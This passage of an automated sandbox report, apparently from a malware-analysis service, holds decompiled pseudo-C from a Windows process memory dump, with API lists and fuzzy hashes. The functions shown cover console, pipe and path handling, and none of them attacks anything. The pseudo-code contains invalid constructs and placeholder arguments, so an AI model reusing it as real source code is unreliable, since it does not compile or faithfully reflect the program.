                                                      						__esi[2] = __edi;
                                                      						__eflags = __ebx - __edi;
                                                      						if(__ebx != __edi) {
                                                      							 *0x4a770908 = 2;
                                                      							__eax = E4A74FCA6(__ebx, __ecx, __edx, __edi, __esi);
                                                      							asm("int3");
                                                      							__ecx =  &_v28;
                                                      							__eax = GetConsoleScreenBufferInfo(__eax,  &_v28);
                                                      							__eflags = __eax;
                                                      							if(__eax != 0) {
                                                      								__eax = _v16;
                                                      								__esi = _v12;
                                                      								__ebx = _v28.dwSize;
                                                      								_v12 - _v16 = _v12 - _v16 + 1;
                                                      							}
                                                      							 *0x0000001C = _t55;
                                                      							 *0x00000020 = _t45;
                                                      							return _t41;
                                                      						} else {
                                                      							__eax =  *0x4a754180; // 0x0
                                                      							__esi[5] = __eax;
                                                      							__eax =  *0x4a7541bc; // 0x0
                                                      							__esi[7] = __eax;
                                                      							 *0x4a754184 =  *0x4a754184 - 1;
                                                      							__eflags =  *0x4a754184;
                                                      							 *0x4a754180 = __edi;
                                                      							 *0x4a7541bc = __edi;
                                                      							if( *0x4a754184 != 0) {
                                                      								__eax = __ebx;
                                                      							} else {
                                                      								__eax = E4A73CD8B();
                                                      							}
                                                      							L21:
                                                      							return 1;
                                                      						}
                                                      					}
                                                      				}
                                                      			}















                                                      0x4a73ccd4
                                                      0x4a73ccd9
                                                      0x4a73ccdd
                                                      0x4a73cce3
                                                      0x4a73cce9
                                                      0x4a73ccee
                                                      0x4a73ccf1
                                                      0x4a73ccf3
                                                      0x4a7478bf
                                                      0x4a7478c2
                                                      0x4a7478c2
                                                      0x4a73ccfc
                                                      0x4a73cd01
                                                      0x4a73cd03
                                                      0x4a7478cc
                                                      0x4a7478cc
                                                      0x4a73cd0b
                                                      0x4a73cd10
                                                      0x4a73cd13
                                                      0x4a73cd15
                                                      0x4a73cd17
                                                      0x4a73cd1e
                                                      0x4a73cd1e
                                                      0x4a73cd26
                                                      0x4a73cd2f
                                                      0x4a73cd31
                                                      0x4a73cd36
                                                      0x4a73cd39
                                                      0x4a7478d6
                                                      0x4a7478d6
                                                      0x4a73cd42
                                                      0x4a73cd47
                                                      0x4a73cd4a
                                                      0x4a73cd4c
                                                      0x4a7478e0
                                                      0x4a7478ea
                                                      0x4a7478ef
                                                      0x4a7478f0
                                                      0x4a7478f5
                                                      0x4a7478fb
                                                      0x4a7478fd
                                                      0x4a747903
                                                      0x4a747907
                                                      0x4a74790b
                                                      0x4a747911
                                                      0x4a747911
                                                      0x4a73b401
                                                      0x4a73b404
                                                      0x4a73b40b
                                                      0x4a73cd52
                                                      0x4a73cd52
                                                      0x4a73cd57
                                                      0x4a73cd5a
                                                      0x4a73cd5f
                                                      0x4a73cd62
                                                      0x4a73cd62
                                                      0x4a73cd68
                                                      0x4a73cd6e
                                                      0x4a73cd74
                                                      0x4a740c4c
                                                      0x4a73cd7a
                                                      0x4a73cd7a
                                                      0x4a73cd7a
                                                      0x4a73cd7f
                                                      0x4a73cd83
                                                      0x4a73cd83
                                                      0x4a73cd4c
                                                      0x4a73cbfe

                                                      APIs
                                                        • Part of subcall function 4A731896: GetProcessHeap.KERNEL32(00000008,4A7325C0,4A7325BB,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?), ref: 4A7318A9
                                                        • Part of subcall function 4A731896: HeapAlloc.KERNEL32(00000000,?,4A7319FD,4A7325BA,00000001,00000000,?,4A737037,4A7325B8,4A737238,00000228,4A736C92,4A7325B8,?,?,4A736CE6), ref: 4A7318B0
                                                      • _pipe.MSVCRT ref: 4A73CBF3
                                                        • Part of subcall function 4A734794: _dup.MSVCRT ref: 4A73479D
                                                        • Part of subcall function 4A7346D3: _dup2.MSVCRT ref: 4A7346E4
                                                        • Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED
                                                      • _get_osfhandle.MSVCRT ref: 4A73CC8F
                                                      • DuplicateHandle.KERNEL32 ref: 4A73CC9D
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: Heap$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe
                                                      • String ID:
                                                      • API String ID: 2751104949-0
                                                      • Opcode ID: 3768905cf307fe4ff35d8fff94006d7e6d6f6925abf9dc8417109737c893c6a1
                                                      • Instruction ID: 4fe73a7530f843a8586fb844e15661722546cc91ed36e1762e1cff7031ada532
                                                      • Opcode Fuzzy Hash: 3768905cf307fe4ff35d8fff94006d7e6d6f6925abf9dc8417109737c893c6a1
                                                      • Instruction Fuzzy Hash: 726104B1A48B11EFD7309FA1C88999ABFFCFB42310B12852EE455CA952E770985CCF50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 41%
                                                      			E4A735A56(intOrPtr _a4) {
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				intOrPtr _t10;
                                                      				intOrPtr* _t13;
                                                      				intOrPtr* _t21;
                                                      				intOrPtr* _t27;
                                                      				signed int _t32;
                                                      				signed int _t37;
                                                      				signed int _t38;
                                                      				wchar_t* _t39;
                                                      				wchar_t* _t40;
                                                      				long _t43;
                                                      				short* _t44;
                                                      				void* _t46;
                                                      				void* _t47;
                                                      				intOrPtr _t51;
                                                      				void* _t54;
                                                      				void* _t56;
                                                      				intOrPtr _t57;
                                                      				void* _t58;
                                                      				void* _t59;
                                                      				intOrPtr* _t60;
                                                      				intOrPtr* _t61;
                                                      				void* _t62;
                                                      				wchar_t* _t65;
                                                      
                                                      				_t10 = _a4;
                                                      				if( *0x4a754081 == 0) {
                                                      					_t60 = E4A7322CA( *(_t10 + 0x3c), 0x4a74bd20, 3);
                                                      					_t43 = 0;
                                                      					if( *_t60 == 0) {
                                                      						L22:
                                                      						return E4A74C936( *0x4a7541c4);
                                                      					}
                                                      					_t48 = _t60;
                                                      					do {
                                                      						_t13 = _t48;
                                                      						_t4 = _t13 + 2; // 0x2
                                                      						_t62 = _t4;
                                                      						do {
                                                      							_t57 =  *_t13;
                                                      							_t13 = _t13 + 2;
                                                      						} while (_t57 != 0);
                                                      						_t48 = _t48 + 2 + (_t13 - _t62 >> 1) * 2;
                                                      						_t43 = _t43 + 1;
                                                      					} while ( *_t48 != _t57);
                                                      					if(_t43 > 3) {
                                                      						L36:
                                                      						_push(0);
                                                      						_push(0x232a);
                                                      						E4A736D44(_t48);
                                                      						return 1;
                                                      					}
                                                      					_t44 = E4A73413B(_t60);
                                                      					if( *_t44 != 0x3d) {
                                                      						goto L36;
                                                      					}
                                                      					_t21 = _t60;
                                                      					_t8 = _t21 + 2; // 0x2
                                                      					_t58 = _t8;
                                                      					do {
                                                      						_t51 =  *_t21;
                                                      						_t21 = _t21 + 2;
                                                      					} while (_t51 != 0);
                                                      					E4A73185A(_t60, (_t21 - _t58 >> 1) + 1, E4A732598(_t51, _t60));
                                                      					_t27 = _t60;
                                                      					_t9 = _t27 + 2; // 0x2
                                                      					_t59 = _t9;
                                                      					do {
                                                      						_t48 =  *_t27;
                                                      						_t27 = _t27 + 2;
                                                      					} while (_t48 != 0);
                                                      					if(_t27 == _t59) {
                                                      						goto L36;
                                                      					}
                                                      					_push(_t44 + 4);
                                                      					_push(_t60);
                                                      					L13:
                                                      					return E4A731730();
                                                      				}
                                                      				_t65 =  *(_t10 + 0x3c);
                                                      				if(_t65 == 0) {
                                                      					goto L22;
                                                      				}
                                                      				_t32 =  *_t65 & 0x0000ffff;
                                                      				if(_t32 == 0) {
                                                      					goto L22;
                                                      				}
                                                      				while(_t32 <= 0x20) {
                                                      					_t65 =  &(_t65[0]);
                                                      					_t32 =  *_t65 & 0x0000ffff;
                                                      					if(_t32 != 0) {
                                                      						continue;
                                                      					}
                                                      					break;
                                                      				}
                                                      				if( *_t65 == 0) {
                                                      					goto L22;
                                                      				}
                                                      				_t61 = __imp___wcsnicmp;
                                                      				_t46 = 2;
                                                      				_push(_t46);
                                                      				_push(0x4a754650);
                                                      				_push(_t65);
                                                      				if( *_t61() == 0) {
                                                      					return E4A73EC28(_t47,  &(_t65[1]));
                                                      				}
                                                      				_push(_t46);
                                                      				_push(0x4a754658);
                                                      				_push(_t65);
                                                      				if( *_t61() == 0) {
                                                      					return E4A74CB35(_t56, _t61,  &(_t65[1]),  &(_t65[1]));
                                                      				}
                                                      				_t37 =  *_t65 & 0x0000ffff;
                                                      				if(_t37 == 0x2f) {
                                                      					goto L36;
                                                      				}
                                                      				if(_t37 == 0x22) {
                                                      					while(1) {
                                                      						_t65 = _t65 + _t46;
                                                      						_t38 =  *_t65 & 0x0000ffff;
                                                      						if(_t38 == 0) {
                                                      							break;
                                                      						}
                                                      						if(_t38 > 0x20) {
                                                      							break;
                                                      						}
                                                      					}
                                                      					_t39 = wcsrchr(_t65, 0x22);
                                                      					_pop(_t48);
                                                      					if(_t39 != 0) {
                                                      						_t48 = 0;
                                                      						 *_t39 = 0;
                                                      					}
                                                      				}
                                                      				if( *_t65 == 0x3d) {
                                                      					goto L36;
                                                      				}
                                                      				_t40 = wcschr(_t65, 0x3d);
                                                      				_pop(_t54);
                                                      				if(_t40 == 0) {
                                                      					return E4A74C9D2(_t54, _t65);
                                                      				}
                                                      				 *_t40 = 0;
                                                      				_push( &(_t40[0]));
                                                      				_push(_t65);
                                                      				goto L13;
                                                      			}





























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _wcsnicmp$wcschr
                                                      • String ID:
                                                      • API String ID: 3270668897-0
                                                      • Opcode ID: ce4185e89fbd873faefcee61e7e0ab766436b8f237ba481a5396622a0d32a15c
                                                      • Instruction ID: 219692b438195517cbb5857ea51972f0959af58e21207a45b33451a2d5b013b2
                                                      • Opcode Fuzzy Hash: ce4185e89fbd873faefcee61e7e0ab766436b8f237ba481a5396622a0d32a15c
                                                      • Instruction Fuzzy Hash: D4415B3259D512BAD7B11B68CC04BF73F69DF09266B534025E982DF182FB508E4EC3A4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 28%
                                                      			E4A73B0F9(int __ebx, void* __edx, void* __edi, intOrPtr _a4) {
                                                      				char _v8;
                                                      				intOrPtr _v12;
                                                      				char _v16;
                                                      				void* __esi;
                                                      				void* _t28;
                                                      				intOrPtr _t31;
                                                      				void* _t37;
                                                      				int _t38;
                                                      				void* _t41;
                                                      				void* _t42;
                                                      				void* _t44;
                                                      				void* _t54;
                                                      				void* _t58;
                                                      				intOrPtr _t63;
                                                      				signed int _t67;
                                                      				signed int _t71;
                                                      
                                                      				_t58 = __edx;
                                                      				_t49 = __ebx;
                                                      				_t63 = _a4;
                                                      				if( *(_t63 + 8) != 0) {
                                                      					_push(__ebx);
                                                      					_push(__edi);
                                                      					if(E4A734490(_t28, 1) != 0) {
                                                      						_t60 =  *(_t63 + 0x10);
                                                      						_t31 = _t60 +  *(_t63 + 8) * 2;
                                                      						_v12 = _t31;
                                                      						while(_t60 < _t31) {
                                                      							_t49 = _t60;
                                                      							if(_t60 >= _t31) {
                                                      								goto L6;
                                                      							} else {
                                                      								while( *_t49 != 0x2022) {
                                                      									_t49 = _t49 + 2;
                                                      									if(_t49 < _t31) {
                                                      										continue;
                                                      									}
                                                      									break;
                                                      								}
                                                      								if(_t49 == _t60) {
                                                      									goto L17;
                                                      								} else {
                                                      									_t44 =  &_v8;
                                                      									_t71 = _t49 - _t60 >> 1;
                                                      									__imp___get_osfhandle(_t60, _t71, _t44, 0);
                                                      									_t54 = 1;
                                                      									if(WriteConsoleW(_t44, ??, ??, ??, ??) == 0 || _v8 != _t71) {
                                                      										L25:
                                                      										_t63 = _a4;
                                                      										goto L26;
                                                      									} else {
                                                      										_t63 = _a4;
                                                      										_t60 = _t49;
                                                      										L17:
                                                      										while(_t49 < _v12) {
                                                      											if( *_t49 == 0x2022) {
                                                      												_t49 = _t49 + 2;
                                                      												continue;
                                                      											}
                                                      											break;
                                                      										}
                                                      										if(_t49 == _t60) {
                                                      											L22:
                                                      											_t31 = _v12;
                                                      											continue;
                                                      										} else {
                                                      											E4A74EA77(_t63);
                                                      											_t37 =  &_v8;
                                                      											_t67 = _t49 - _t60 >> 1;
                                                      											__imp___get_osfhandle(_t60, _t67, _t37, 0);
                                                      											_t54 = 1;
                                                      											_t38 = WriteConsoleW(_t37, ??, ??, ??, ??);
                                                      											_t60 = _t38;
                                                      											_t39 = E4A731605();
                                                      											if(_t38 == 0 || _v8 != _t67) {
                                                      												goto L25;
                                                      											} else {
                                                      												_t63 = _a4;
                                                      												_t60 = _t49;
                                                      												goto L22;
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      							goto L33;
                                                      						}
                                                      						goto L6;
                                                      					} else {
                                                      						if(E4A73453E( *(_t63 + 8) +  *(_t63 + 8), 1,  *(_t63 + 0x10),  *(_t63 + 8) +  *(_t63 + 8),  &_v16) == 0) {
                                                      							L26:
                                                      							if(E4A733B03(_t39, _t54, 1) == 0) {
                                                      								_t41 = E4A736BEA(_t40, 1);
                                                      								if(_t41 == 0) {
                                                      									_push(_t41);
                                                      									_push(0x70);
                                                      									goto L30;
                                                      								}
                                                      							} else {
                                                      								_push(0);
                                                      								_push(0x1d);
                                                      								L30:
                                                      								E4A736D44(_t54);
                                                      								_pop(_t54);
                                                      							}
                                                      							_t42 = E4A74FCA6(_t49, _t54, _t58, _t60, _t63);
                                                      							asm("int3");
                                                      							_t28 = _t42 + 1;
                                                      							return _t28;
                                                      						} else {
                                                      							_t48 =  *(_t63 + 8);
                                                      							_t39 =  *(_t63 + 8) + _t48;
                                                      							if(_v16 <  *(_t63 + 8) + _t48) {
                                                      								goto L26;
                                                      							} else {
                                                      								L6:
                                                      								goto L2;
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					L2:
                                                      					 *((intOrPtr*)(_t63 + 4)) =  *((intOrPtr*)(_t63 + 4)) + E4A73A8A9(_t63,  *(_t63 + 0x10));
                                                      					 *( *(_t63 + 0x10)) = 0;
                                                      					 *(_t63 + 8) =  *(_t63 + 8) & 0;
                                                      					return 0;
                                                      				}
                                                      				L33:
                                                      			}




















                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d09dc55c9b1ee97bf16965b22d64adc207026b810f9cc9fac48a0f137e4de4d3
                                                      • Instruction ID: d90b17459438e25a741f9a921bc688f43c59c74d3f5f10ff7057ba29943fadc5
                                                      • Opcode Fuzzy Hash: d09dc55c9b1ee97bf16965b22d64adc207026b810f9cc9fac48a0f137e4de4d3
                                                      • Instruction Fuzzy Hash: D4411B72708301AFDB709BB8C849B9B7BB9EF40354F164425E916DB181E671EB8CC7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E4A732FAF(void* __ecx, WCHAR* _a4, long _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				WCHAR* _t22;
                                                      				intOrPtr* _t28;
                                                      				signed int _t30;
                                                      				short* _t31;
                                                      				WCHAR* _t33;
                                                      				int _t36;
                                                      				intOrPtr* _t42;
                                                      				void* _t45;
                                                      				short _t49;
                                                      				intOrPtr _t50;
                                                      				short _t51;
                                                      				short _t53;
                                                      				intOrPtr _t54;
                                                      				short* _t55;
                                                      				void* _t57;
                                                      				void* _t58;
                                                      				WCHAR* _t60;
                                                      				long _t62;
                                                      				WCHAR* _t66;
                                                      				intOrPtr* _t67;
                                                      				short* _t69;
                                                      
                                                      				_push(__ecx);
                                                      				_v8 = _v8 & 0x00000000;
                                                      				_t60 = _a12;
                                                      				_t22 = _t60;
                                                      				_t4 =  &(_t22[1]); // 0x26
                                                      				_t55 = _t4;
                                                      				_t45 = 2;
                                                      				do {
                                                      					_t49 =  *_t22;
                                                      					_t22 = _t22 + _t45;
                                                      				} while (_t49 != 0);
                                                      				E4A73185A(_t60, (_t22 - _t55 >> 1) + 1, E4A732598(_t49, _t60));
                                                      				_t56 =  *_t60 & 0x0000ffff;
                                                      				if(( *_t60 & 0x0000ffff) == 0) {
                                                      					_t66 = _a4;
                                                      					E4A732C56(_t45, _t56, _t60, _t66, _a8, 0);
                                                      					_t67 = _t66 + 4;
                                                      					_t28 = _t67;
                                                      					_t13 = _t28 + 2; // -2
                                                      					_t57 = _t13;
                                                      					do {
                                                      						_t50 =  *_t28;
                                                      						_t28 = _t28 + _t45;
                                                      					} while (_t50 != 0);
                                                      					_t30 = _t28 - _t57 >> 1;
                                                      					if(_t30 < 0x101) {
                                                      						if(_t30 != 1) {
                                                      							goto L19;
                                                      						} else {
                                                      						}
                                                      					} else {
                                                      						 *0x4a754128 = 3;
                                                      						goto L21;
                                                      					}
                                                      				} else {
                                                      					_t33 = _t60;
                                                      					_t5 =  &(_t33[1]); // 0x26
                                                      					_t69 = _t5;
                                                      					do {
                                                      						_t53 =  *_t33;
                                                      						_t33 = _t33 + _t45;
                                                      					} while (_t53 != 0);
                                                      					if(_t33 - _t69 >> 1 == _t45) {
                                                      						if(_t60[1] != 0x3a) {
                                                      							goto L6;
                                                      						} else {
                                                      							_t67 = _a4;
                                                      							E4A732C56(_t45, _t56, _t60, _t67, _a8, _t56);
                                                      							_t42 = _t67;
                                                      							_t17 = _t42 + 2; // 0x2
                                                      							_t58 = _t17;
                                                      							do {
                                                      								_t54 =  *_t42;
                                                      								_t42 = _t42 + _t45;
                                                      							} while (_t54 != 0);
                                                      							_t30 = _t42 - _t58 >> 1;
                                                      							if(_t30 > 3) {
                                                      								L19:
                                                      								_t51 =  *0x4a770664; // 0x5c
                                                      								_t31 = _t67 + _t30 * 2;
                                                      								 *_t31 = _t51;
                                                      								 *((short*)(_t31 + 2)) = 0;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						L6:
                                                      						_t36 = SetErrorMode(0);
                                                      						SetErrorMode(1);
                                                      						_t62 = GetFullPathNameW(_t60, _a8, _a4,  &_a12);
                                                      						SetErrorMode(_t36);
                                                      						if(_t62 == 0 || _t62 > _a8) {
                                                      							 *0x4a754128 = 0xce;
                                                      							L21:
                                                      							_v8 = 1;
                                                      						}
                                                      					}
                                                      				}
                                                      				return _v8;
                                                      			}




























                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000000,00000024,00000025,00000000,00000024,00000104,00000000,?,?,?,4A7396D2,?,00000104,?,00000000,00000104), ref: 4A733015
                                                      • SetErrorMode.KERNEL32(00000001,?,?,4A7396D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024,00000000,00000000), ref: 4A73301B
                                                      • GetFullPathNameW.KERNEL32(00000024,00000000,00000000,00000024,?,?,4A7396D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024), ref: 4A733028
                                                      • SetErrorMode.KERNEL32(00000000,?,?,4A7396D2,?,00000104,?,00000000,00000104,00000000,00000208,00000000,00000024,00000000,00000000), ref: 4A733031
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorMode$FullNamePath
                                                      • String ID:
                                                      • API String ID: 268959451-0
                                                      • Opcode ID: ed860cc3ff3186575f263f386226962d13671a8474887fb1b3a9f0c587470be5
                                                      • Instruction ID: 6b591a8e3dc7f7397b4135bb02acb4c2f3c47aecc5bc7665727ac1ad2c3dc506
                                                      • Opcode Fuzzy Hash: ed860cc3ff3186575f263f386226962d13671a8474887fb1b3a9f0c587470be5
                                                      • Instruction Fuzzy Hash: FB311077604216ABDB308F98CC45ADA7FB9EF85760F068414EA05CF251E375EB48C790
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 23%
                                                      			E4A7366BD(short* __eax, void* __edx, void* __edi) {
                                                      				void* __ebx;
                                                      				void* __esi;
                                                      				short* _t42;
                                                      				short* _t43;
                                                      				void* _t44;
                                                      				void* _t49;
                                                      				intOrPtr _t52;
                                                      				void* _t55;
                                                      				void* _t58;
                                                      				void* _t71;
                                                      				int _t73;
                                                      				void* _t74;
                                                      				void* _t80;
                                                      				int _t83;
                                                      				void* _t86;
                                                      				void* _t87;
                                                      				void* _t88;
                                                      				void* _t89;
                                                      				short* _t90;
                                                      				void* _t92;
                                                      				intOrPtr* _t93;
                                                      				int _t104;
                                                      				signed int _t106;
                                                      
                                                      				L0:
                                                      				while(1) {
                                                      					L0:
                                                      					_t87 = __edi;
                                                      					_t86 = __edx;
                                                      					_t42 = __eax;
                                                      					if(__eax == 0x4a768640) {
                                                      						goto L10;
                                                      					}
                                                      					L8:
                                                      					__eax = __eax - 1;
                                                      					__eax = __eax - 1;
                                                      					L9:
                                                      					 *((intOrPtr*)(_t106 - 0x210)) = _t42;
                                                      					if( *_t42 != 0xa) {
                                                      						continue;
                                                      					}
                                                      					L10:
                                                      					if( *_t42 != 0x3a) {
                                                      						 *((intOrPtr*)(_t106 - 0x210)) = _t42;
                                                      					}
                                                      					L12:
                                                      					_t43 = E4A732B0D(_t42, _t73);
                                                      					 *((intOrPtr*)(_t106 - 0x224)) = _t43;
                                                      					if( *_t43 == 0x3a) {
                                                      						L3:
                                                      						_t44 = E4A7318EB( *((intOrPtr*)(_t106 - 0x210)), 0xa);
                                                      						_t89 = _t44;
                                                      						if(_t89 == _t73) {
                                                      							L27:
                                                      							__imp___get_osfhandle(1);
                                                      							if(SetFilePointer(_t44,  *(_t106 - 0x208), _t73, _t73) ==  *((intOrPtr*)(_t106 - 0x21c))) {
                                                      								goto L4;
                                                      							}
                                                      							L28:
                                                      							L30:
                                                      							_t83 =  *(_t106 - 0x20c);
                                                      							if(_t83 == 0x200) {
                                                      								goto L4;
                                                      							}
                                                      							L31:
                                                      							_t104 = _t83 - ( *((intOrPtr*)(_t106 - 0x210)) - 0x4a768640 >> 1);
                                                      							_t71 = E4A73661C();
                                                      							if(_t71 != 0) {
                                                      								_t71 = WideCharToMultiByte( *0x4a7541b8, _t73, 0x4a768640, _t104, _t73, _t73, _t73, _t73);
                                                      								_t104 = _t71;
                                                      							}
                                                      							L33:
                                                      							__imp___get_osfhandle(1);
                                                      							_t50 = SetFilePointer(_t71,  *(_t106 - 0x208),  ~_t104, _t73);
                                                      							L14:
                                                      							if( *0x4a7540b8 == 1) {
                                                      								L1:
                                                      								E4A733AB3( *(_t106 - 0x208));
                                                      								_t52 =  *((intOrPtr*)(_t106 - 0x218));
                                                      								_pop(_t88);
                                                      								_pop(_t92);
                                                      								_pop(_t74);
                                                      								return E4A7313A9(_t52, _t74,  *(_t106 - 4) ^ _t106, _t86, _t88, _t92);
                                                      							} else {
                                                      								goto L15;
                                                      							}
                                                      							while(1) {
                                                      								L15:
                                                      								E4A734B2A(_t50);
                                                      								_t93 = __imp___get_osfhandle;
                                                      								_t55 =  *_t93( *(_t106 - 0x208), _t73, _t73, 1);
                                                      								_pop(_t80);
                                                      								_t56 = SetFilePointer(_t55, ??, ??, ??);
                                                      								 *(_t87 + 8) = _t56;
                                                      								if(_t56 >=  *((intOrPtr*)(_t106 - 0x228)) &&  *(_t106 - 0x214) == _t73) {
                                                      								}
                                                      								L24:
                                                      								if( *(_t106 - 0x20c) != _t73) {
                                                      									L29:
                                                      									E4A7357F4(_t56, _t87);
                                                      									L40:
                                                      									 *0x4a7540b4 =  *((intOrPtr*)(_t87 + 0x110));
                                                      									E4A736D44(_t80, 0x400023ab, 1, _t106 - 0x104);
                                                      									 *((intOrPtr*)(_t106 - 0x218)) = 1;
                                                      									goto L1;
                                                      								}
                                                      								L25:
                                                      								if( *(_t106 - 0x214) == _t73) {
                                                      									goto L29;
                                                      								}
                                                      								L26:
                                                      								_t50 = SetFilePointer( *_t93(_t73),  *(_t106 - 0x208), _t73, _t73);
                                                      								 *(_t106 - 0x214) = _t73;
                                                      								while(1) {
                                                      									L15:
                                                      									E4A734B2A(_t50);
                                                      									_t93 = __imp___get_osfhandle;
                                                      									_t55 =  *_t93( *(_t106 - 0x208), _t73, _t73, 1);
                                                      									_pop(_t80);
                                                      									_t56 = SetFilePointer(_t55, ??, ??, ??);
                                                      									 *(_t87 + 8) = _t56;
                                                      									if(_t56 >=  *((intOrPtr*)(_t106 - 0x228)) &&  *(_t106 - 0x214) == _t73) {
                                                      									}
                                                      									goto L17;
                                                      								}
                                                      								goto L24;
                                                      								L17:
                                                      								_t58 =  *_t93( *(_t106 - 0x208), 0x4a768640, 0x200, _t106 - 0x20c);
                                                      								_pop(_t80);
                                                      								_push(_t58);
                                                      								if(E4A7367D3() == 0) {
                                                      									goto L24;
                                                      								}
                                                      								L18:
                                                      								_t56 =  *(_t106 - 0x20c);
                                                      								if(_t56 == _t73) {
                                                      									goto L25;
                                                      								}
                                                      								L19:
                                                      								if(_t56 == 0xffffffff ||  *0x4a768640 == _t73 ||  *((intOrPtr*)(_t106 - 0x104)) == _t73) {
                                                      									goto L24;
                                                      								} else {
                                                      									L22:
                                                      									0x4a768640[_t56] = 0;
                                                      									_t90 = E4A7318EB(0x4a768640, 0x3a);
                                                      									if(_t90 == _t73) {
                                                      										continue;
                                                      									}
                                                      									L23:
                                                      									_t42 = _t90;
                                                      									_t89 = _t90 + 2;
                                                      									goto L9;
                                                      								}
                                                      							}
                                                      						}
                                                      						L4:
                                                      						E4A73654D( *((intOrPtr*)(_t106 - 0x224)), _t106 - 0x204, 0x80, _t73);
                                                      						_t49 = _t106 - 0x104;
                                                      						__imp___wcsicmp(_t49, _t106 - 0x204);
                                                      						if(_t49 != 0) {
                                                      							goto L13;
                                                      						}
                                                      						L5:
                                                      						 *0x4a7540b8 =  *( *((intOrPtr*)(_t106 - 0x220)) + 0x40) & 0x00000001;
                                                      						_t50 = E4A73661C();
                                                      						if(_t89 == _t73) {
                                                      							L34:
                                                      							if(_t50 == 0) {
                                                      								L36:
                                                      								_t50 =  *(_t106 - 0x20c);
                                                      								L39:
                                                      								 *(_t87 + 8) =  *(_t87 + 8) + _t50;
                                                      								goto L14;
                                                      							}
                                                      							L35:
                                                      							_push(_t73);
                                                      							_push(_t73);
                                                      							_push(_t73);
                                                      							_push(_t73);
                                                      							_push( *(_t106 - 0x20c));
                                                      							_push(0x4a768640);
                                                      							L38:
                                                      							_t50 = WideCharToMultiByte( *0x4a7541b8, _t73, ??, ??, ??, ??, ??, ??);
                                                      							goto L39;
                                                      						}
                                                      						L6:
                                                      						if(_t50 != 0) {
                                                      							L37:
                                                      							_push(_t73);
                                                      							_push(_t73);
                                                      							_push(_t73);
                                                      							_push(_t73);
                                                      							_push(_t89 - 0x4a768640 + 2 >> 1);
                                                      							_push(0x4a768640);
                                                      							goto L38;
                                                      						}
                                                      						L7:
                                                      						 *(_t87 + 8) =  *(_t87 + 8) + (_t89 - 0x4a768640 + 2 >> 1);
                                                      						goto L14;
                                                      					}
                                                      					L13:
                                                      					_t90 = E4A7318EB(_t89, 0x3a);
                                                      					if(_t90 != _t73) {
                                                      						goto L23;
                                                      					}
                                                      					goto L14;
                                                      				}
                                                      			}



























                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _get_osfhandle$FilePointer
                                                      • String ID:
                                                      • API String ID: 2479667682-0
                                                      • Opcode ID: 3c905f1d5f23a07a2784eb658aa25881ec6d8ab90d7683a61764a12342af6fd6
                                                      • Instruction ID: 2f3a59938668a7df50b7007ae17f52fcf72c01602959e9d3f9b58eb1609ef4e3
                                                      • Opcode Fuzzy Hash: 3c905f1d5f23a07a2784eb658aa25881ec6d8ab90d7683a61764a12342af6fd6
                                                      • Instruction Fuzzy Hash: 3B31C072809A25ABDFB16B60CC987E97FB8EB01390F1341A1D656EB093D7708D89CB51
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E4A73D926(void* __ecx, wchar_t* _a4) {
                                                      				wchar_t* _v8;
                                                      				long _t29;
                                                      				int _t30;
                                                      				signed int _t31;
                                                      				long _t33;
                                                      				signed int _t39;
                                                      				wchar_t* _t50;
                                                      				void* _t52;
                                                      				void* _t53;
                                                      				void* _t55;
                                                      				void* _t56;
                                                      				void* _t57;
                                                      
                                                      				_t50 = _a4;
                                                      				_t33 = wcstol( *(_t50 + 0x38),  &_a4, 0);
                                                      				_t29 = wcstol( *(_t50 + 0x3c),  &_v8, 0);
                                                      				if( *_a4 != 0 ||  *_v8 != 0) {
                                                      					_push( *(_t50 + 0x3c));
                                                      					_push( *(_t50 + 0x38));
                                                      					if(( *(_t50 + 0x40) & 0x00000002) != 0) {
                                                      						_t30 = lstrcmpiW();
                                                      					} else {
                                                      						_t30 = lstrcmpW();
                                                      					}
                                                      				} else {
                                                      					_t30 = _t33 - _t29;
                                                      				}
                                                      				_t52 =  *((intOrPtr*)(_t50 + 0x44)) - 1;
                                                      				if(_t52 != 0) {
                                                      					_t53 = _t52 - 1;
                                                      					if(_t53 == 0) {
